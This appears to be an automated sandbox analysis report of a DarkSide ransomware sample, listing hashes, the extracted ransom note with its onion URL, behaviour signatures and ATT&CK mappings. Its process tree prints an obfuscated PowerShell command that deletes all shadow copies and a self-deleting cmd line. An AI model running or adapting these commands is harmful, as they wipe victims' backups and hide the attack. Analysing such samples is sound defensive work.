Analysis

  • max time kernel
    122s
  • max time network
    166s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    31-01-2022 05:59

General

  • Target

    adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe

  • Size

    59KB

  • MD5

    222792d2e75782516d653d5cccfcf33b

  • SHA1

    2430f63c64d3e26b13ec4752d8976ff9c9dbbd1b

  • SHA256

    adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e

  • SHA512

    41233501b78c2060f8a5bfe513b45e1c4dcc510b922ec160b149b69254e90ffd1f54b5c4ed37cd3ad2129dd1227871fe41a7ff3cd47a0fb5354ca7ef812b4123

Malware Config

Extracted

Path

C:\\README.82ee2099.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/61XCW6PKCUTDV5AZD8WK1JWU84BJBWSI25DGLKZ6O6STDBITLAFAH3X1MSRQGRBS When you open our website, put the following data in the input form: Key: sRF28VknkyCwkl78n8tU2w5CUN5gQSiFQXJQ4YjJ3zT5Z3BaGHqUemIYakak5QdIr9cwwtZGxjgkXaQoG2kGUNB2IcTvDVP3ID53yoBwY8UiMIzJ33767QNMQ2CgGrvQhHvU7QN1LAmLgETIE545H0OFZaLiE85s64A9UowKvPxEFFNlEtl8yCCClJIpX1Z2w6QpVH2toANFNk5BOerGTSat8xN18v42024yvHshbcVaymihEKEnl95lGcJprePMNuMFMsrYvOnEmTQkkwjyjF50B66lqGpYTnGb6rNJ9ILGQ7vTVi1QPsaKe2mLxAuB8zawZUdVNyqk8YghrH9yyEIGixafE4bqxfxNlh8oLA1GjCmD3Hu7b1vY6wggbch6XJ770QZzomCOmJTxWljABf2U996YQ8Ea5WI1mjbUwgiU9YoYqkM4zhG3WdGDV1XC7kqMz1qiDrhHw6qzZxNPNcpcP4aoMf4bmpdRTLolDzehxvWygMgO0vkarbndW1Q2xCfJLpRvgwEm3EgLmb7aQK59oBO7LP4UCqc1HHPuq4nsr9fmpuTqGbj !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidfqzcuhtk2.onion/61XCW6PKCUTDV5AZD8WK1JWU84BJBWSI25DGLKZ6O6STDBITLAFAH3X1MSRQGRBS

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

  • Modifies extensions of user files 4 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Control Panel 1 IoCs
  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe
    "C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe"
    1⤵
    • Modifies extensions of user files
    • Sets desktop wallpaper using registry
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3448
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2288
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\ADCB91~1.EXE >> NUL
      2⤵
        PID:4524
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1064

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Credential Access

    Credentials in Files

    1
    T1081

    Discovery

    System Information Discovery

    1
    T1082

    Collection

    Data from Local System

    1
    T1005

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      MD5

      ea6243fdb2bfcca2211884b0a21a0afc

      SHA1

      2eee5232ca6acc33c3e7de03900e890f4adf0f2f

      SHA256

      5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8

      SHA512

      189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      MD5

      fa208d0582c9854749d4d38164e606b5

      SHA1

      87c6d1b27c6f46cecb1de615c3e7b11796b8086a

      SHA256

      400de0823331d82a134ff8e23fd598be515c4983f275fd5f3116f660b39c9e94

      SHA512

      d52aa174f73cce4735a4422c518176c28981aa4e48294d9e82423cc88eeb9375a0217014c0adb94a1c21137711164fac557db192df620be8545d583dd0fbe530

    • memory/2288-123-0x000001CFF72A0000-0x000001CFF72C2000-memory.dmp
      Filesize

      136KB

    • memory/2288-129-0x000001CFF4FF3000-0x000001CFF4FF5000-memory.dmp
      Filesize

      8KB

    • memory/2288-128-0x000001CFF4FF0000-0x000001CFF4FF2000-memory.dmp
      Filesize

      8KB

    • memory/2288-130-0x000001CFF7450000-0x000001CFF74C6000-memory.dmp
      Filesize

      472KB

    • memory/2288-142-0x000001CFF4FF6000-0x000001CFF4FF8000-memory.dmp
      Filesize

      8KB